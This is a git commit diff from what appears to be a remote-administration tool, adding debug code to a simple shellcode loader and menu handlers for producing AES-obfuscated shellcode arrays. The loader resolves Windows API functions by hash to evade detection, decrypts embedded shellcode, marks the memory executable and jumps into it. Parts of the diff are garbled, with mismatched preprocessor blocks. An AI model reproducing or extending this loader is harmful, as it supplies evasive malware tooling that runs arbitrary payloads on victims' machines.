Improve: Add debug code for SCLoader

2025-11-20 05:23:28 +08:00
parent bd5f5f0547
commit a5f068b036
5 changed files with 28 additions and 4 deletions
--- a/client/SimpleSCLoader.c
+++ b/client/SimpleSCLoader.c
@@ -19,6 +19,9 @@ typedef HMODULE(WINAPI* _LoadLibraryA)(LPCSTR lpLibFileName);
 #define VirtualAlloc_Hash 0x5E893462
 typedef LPVOID(WINAPI* _VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
 #define VirtualProtect_Hash 1819198468
 typedef BOOL(WINAPI* _VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
 #define Sleep_Hash 1065713747
 typedef VOID(WINAPI* _Sleep)(DWORD dwMilliseconds);
@@ -209,11 +212,21 @@ inline void* mc(void* dest, const void* src, size_t n) {
 // A simple shell code loader.
 // Copy left (c) yuanyuanxiang.
 #ifdef _DEBUG
-int main()
+// Tip: Use menu to generate TinyRun.c.
 #ifdef _WIN64
 #include "../x64/Release/TinyRun.c"
 #else
-int entry()
+#include "../Release/TinyRun.c"
 #endif
 int main(){
 	sc.len = Shellcode_len;
 	if (sc.len > sizeof(sc.data)) return -1;
 	memcpy(sc.data, Shellcode, sc.len);
 	memcpy(sc.aes_iv, "It is a example", 16);
 	memcpy(sc.aes_key, "It is a example", 16);
 #else
 int entry(){
 #endif
 {
 	if (!sc.data[0] || !sc.len)
        return -1;
@@ -226,10 +239,13 @@ int entry()
 	_GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0);
 	_LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress);
 	_VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress);
 	_VirtualProtect VirtualProtect = (_VirtualProtect)get_proc_address_from_hash(kernel32, VirtualProtect_Hash, GetProcAddress);
 	_Sleep Sleep = (_Sleep)get_proc_address_from_hash(kernel32, Sleep_Hash, GetProcAddress);
-    void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec) {
        mc(exec, sc.data, sc.len);
 		DWORD oldProtect = 0;
 		if (!VirtualProtect(exec, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return -3;
        ((void(*)())exec)();
        Sleep(INFINITE);
    }
--- a/server/2015Remote/2015Remote.rc
+++ b/server/2015Remote/2015Remote.rc
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -533,6 +533,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
    ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin)
    ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin)
        ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins)
        ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray)
        END_MESSAGE_MAP()
@@ -3336,6 +3337,12 @@ void CMy2015RemoteDlg::OnObfsShellcode()
    shellcode_process(&obfs);
 }
 void CMy2015RemoteDlg::OnShellcodeAesCArray()
 {
 	ObfsAes obfs;
 	shellcode_process(&obfs);
 }
 void CMy2015RemoteDlg::OnToolGenShellcodeBin()
 {
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -356,4 +356,5 @@ public:
    afx_msg void OnShellcodeAesBin();
    afx_msg void OnShellcodeTestAesBin();
    afx_msg void OnToolReloadPlugins();
    afx_msg void OnShellcodeAesCArray();
 };
--- a/server/2015Remote/resource.h
+++ b/server/2015Remote/resource.h